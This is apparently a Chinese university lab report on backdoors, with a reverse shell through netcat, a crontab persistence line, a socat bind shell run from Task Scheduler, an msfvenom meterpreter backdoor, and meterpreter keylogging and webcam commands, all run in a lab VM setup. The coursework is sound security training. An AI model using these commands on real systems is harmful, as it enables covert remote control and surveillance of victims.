20145307陈俊达《网络对抗》Exp2 后门原理与实践
20145307陈俊达《网络对抗》Exp2 后门原理与实践
基础问题回答
例举你能想到的一个后门进入到你系统中的可能方式?
非正规网站下载的软件 脚本 或者游戏中附加的第三方插件
例举你知道的后门如何启动起来(win及linux)的方式?
自启动型木马,windows计划任务
Meterpreter有哪些给你映像深刻的功能?
自动制作后门这点很厉害,黑客只需要输入命令即可,键盘录入器这是最致命的,你所有的密码都会被发现并记录
如何发现自己有系统有没有被安装后门?
及时安装可靠的防火墙
常用后门工具实践
Windows获得Linux Shell
在Windows下,先使用ipconfig指令查看本机IP,使用ncat.exe程序监听本机的5307端口:

在Kali环境下,使用nc指令的-e选项反向连接Windows主机的5307端口:

Linux获得Windows Shell
过程与之前的类似,使用nc指令监听5307端口:

实验内容
使用netcat获取主机操作Shell,cron启动
先在Windows系统下,监听5307端口
用crontab -e指令编辑一条定时任务,选择编辑器时选择基本的vim编辑器就行:
在最后一行添加30 * * * * /bin/netcat 192.168.79.130 5307 -e /bin/sh,意思是在每个小时的第30分钟反向连接Windows主机的5307端口

使用socat获取主机操作Shell, 任务计划启动
基础知识
socat是ncat的增强版,它使用的格式是socat [options]
实践过程
在Windows系统下,打开控制面板->管理工具->任务计划程序,创建任务,填写任务名称后,新建一个触发器:
在操作->程序或脚本中选择你的socat.exe文件的路径,在添加参数一栏填写tcp-listen:5307 exec:cmd.exe,pty,stderr,这个命令的作用是把cmd.exe绑定到端口5307,同时把cmd.exe的stderr重定向到stdout上:

创建完成之后,注销用户,并再次登录
此时,在Kali环境下输入指令socat - tcp:192.168.79.130:5307,这里的第一个参数-代表标准的输入输出,第二个流连接到Windows主机的5307端口,此时可以发现已经成功获得了一个cmd shell:

使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
输入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.79.128 LPORT=5307 -f exe > 20145307_backdoor.exe生成后门程序,通过nc指令将生成的后门程序传送到Windows主机上
在Kali上使用msfconsole指令进入msf控制台,使用监听模块,设置payload,设置反弹回连的IP和端口:

设置完成后,执行监听:

打开Windows上的后门程序此时Kali上已经获得了Windows主机的连接,并且得到了远程控制的shell:

使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权,使用record_mic指令可以截获一段音频,使用webcam_snap指令可以使用摄像头进行拍照,使用webcam stream指令可以使用摄像头进行录像,使用screenshot指令可以进行截屏,使用keyscan_start指令开始记录下击键的过程,使用keyscan_dump指令读取击键的记录
对对对,但是我用的win7虚拟机,没摄像头驱动,没麦克风驱动,但是屏幕截图还是可以做的吗!截个图表示我这个鬼东西做出来了 是能用的


20145307陈俊达《网络对抗》Exp2 后门原理与实践的更多相关文章
- 20155331 丹增旦达 网络攻防 Exp2后门原理与实践
20155331 丹增旦达<网络攻防>Exp2后门原理与实践 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任务计划启 ...
- 20155323刘威良 网络对抗 Exp2 后门原理与实践
20155323 刘威良<网络攻防>Exp2后门原理与实践 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主机操作Shell, ...
- 20155302 Exp2 后门原理与实践
20155302<网络对抗>后门原理与实践 实验要求 1.使用netcat获取主机操作Shell,cron启动 (0.5分) 2.使用socat获取主机操作Shell, 任务计划启动 (0 ...
- 2017-2018-2 20155314《网络对抗技术》Exp2 后门原理与实践
2017-2018-2 20155314<网络对抗技术>Exp2 后门原理与实践 目录 实验要求 实验内容 实验环境 预备知识 1.后门概念 2.常用后门工具 实验步骤 1 用nc或net ...
- 2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践 1. 后门原理与实践实验说明及预备知识 一.实验说明 任务一:使用netcat获取主机操作Shell,cron启动 ( ...
- 20155324《网络对抗》Exp2 后门原理与实践
20155324<网络对抗>Exp2 后门原理与实践 20155324<网络对抗>Exp2 后门原理与实践 常用后门工具实践 Windows获得Linux Shell 在Win ...
- 2018-2019-2 20165237《网络对抗技术》Exp2 后门原理与实践
2018-2019-2 20165237<网络对抗技术>Exp2 后门原理与实践 一.实践目标 使用netcat获取主机操作Shell,cron启动 使用socat获取主机操作Shell, ...
- 2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践 实验内容(概要): (1)使用netcat获取主机Shell,cron启动 首先两个电脑(虚拟机)都得有netcat, ...
- 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践
- 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践 - 实验任务 (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主 ...
随机推荐
- JS 添加js节点
function AddScriptNode(src) { var N = document.createElement("script"); N.setAttribute(&qu ...
- Go基础---->go的基础学习(四)
这里简单的介绍一下go中的关于多线程的知识. Go中的多线程 一.go中简单的并发例子 package main import ( "fmt" "time" ) ...
- MyBatis——日志
Logging Mybatis内置的日志工厂提供日志功能,具体的日志实现有以下几种工具: SLF4J Apache Commons Logging Log4j 2 Log4j JDK logging ...
- 关于sencha touch 用phonegap打包后,docked悬停的组件被手机软键盘遮挡的解决方法
这个问题应该算是phonegap的一个bug,在mainifest.xml 里android:windowSoftInputMode设置成了adjustpan,理论上不会出现遮挡悬停组件这种情况, 不 ...
- ./configure
./configure --prefix=/usr/local/scws --prefix选项是配置安装的路径,如果不配置该选项,安装后可执行文件默认放在/usr/local/bin,库文件默认放在/ ...
- 用C或C++为Python编写模块
1.使用c或c++编写对应的函数例如: //modtest.c int abs(int number){ ){ return -number; } else{ return number; } } 2 ...
- nodejs 环境搭建
一 下载nodejs 官网:http://nodejs.cn/ 有时官网有点慢,可以去其他地方下载 统一下载站:http://www.3987.com/xiazai/2/43/57188.html 二 ...
- 从零打造在线网盘系统之Hibernate框架起步
欢迎浏览Java工程师SSH教程从零打造在线网盘系统系列教程,本系列教程将会使用SSH(Struts2+Spring+Hibernate)打造一个在线网盘系统,本系列教程是从零开始,所以会详细以及着重 ...
- 170713、springboot编程之多数据源切换
我们在开发过程中可能需要用到多个数据源,我们有一个项目(MySQL)就是和别的项目(SQL Server)混合使用了.其中SQL Server是别的公司开发的,有些基本数据需要从他们平台进行调取,那么 ...
- hello gradle
首先下载和安装gradle可以参考官网下载地址,建议下载带有源码和文档的,以便后期查阅. 下载完以后打开终端输入gradle -v有如下信息输出,表示安装成功: bogon:gradle scott$ ...